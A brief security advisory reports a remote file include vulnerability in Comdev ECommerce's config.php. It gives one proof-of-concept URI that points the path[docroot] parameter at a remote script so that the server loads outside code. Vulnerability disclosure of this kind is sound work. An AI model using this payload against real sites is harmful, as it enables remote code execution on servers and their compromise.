Comdev ECommerce Config.PHP Remote File Include Vulnerability

Comdev ECommerce Config.PHP Remote File Include Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/oneadmin/config.php?path[docroot]=http://www.example.com/badscript.php.txt